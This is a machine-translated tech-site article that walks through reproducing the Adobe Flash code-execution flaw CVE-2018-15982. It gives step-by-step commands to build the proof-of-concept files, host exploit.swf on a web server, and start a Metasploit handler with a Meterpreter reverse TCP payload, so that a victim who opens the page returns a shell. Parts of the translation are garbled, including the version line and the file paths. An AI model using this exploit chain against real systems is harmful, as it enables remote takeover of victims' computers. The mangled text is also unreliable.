Shulou(Shulou.com)05/31 Report--

This article introduces you how to reproduce the arbitrary code execution vulnerability CVE-2018-15982, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Vulnerability description:

On November 29th, 2018, a team discovered an APT attack against Russia for the first time worldwide, carrying the latest Flash 0day vulnerability and a self-destruct Trojan program through a Russian-language hospital employee questionnaire document. The vulnerability (CVE-2018-15982) allows a maliciously crafted Flash object to execute code on the victim's computer, thereby gaining access to the system's command line.

Affected version:

AdobeFlash Player 64.bin

Two bin files, 86bin and 64bin, are generated

Poc executes and opens http

Generate poc

Cp * .bin CVE-2018-15982_EXP/

Cd CVE-2018-15982_EXP/

Python CVE_2018_15982.py-I 86.bin-I 64.bin

Enable the web service

Service apache2 start

Cp index.html / var/www/html/

Cp exploit.swf / var/www/html/

Msf snooping

Msfconsole

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp_rc4

Set lport 4444

Set lhost 192.168.23.130

Set RC4PASSWORD zale

Run

Access http://192.168.23.130/index.html through the target machine

You can see that shell is returned.

On how to carry out arbitrary code execution vulnerability CVE-2018-15982 reproduction to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.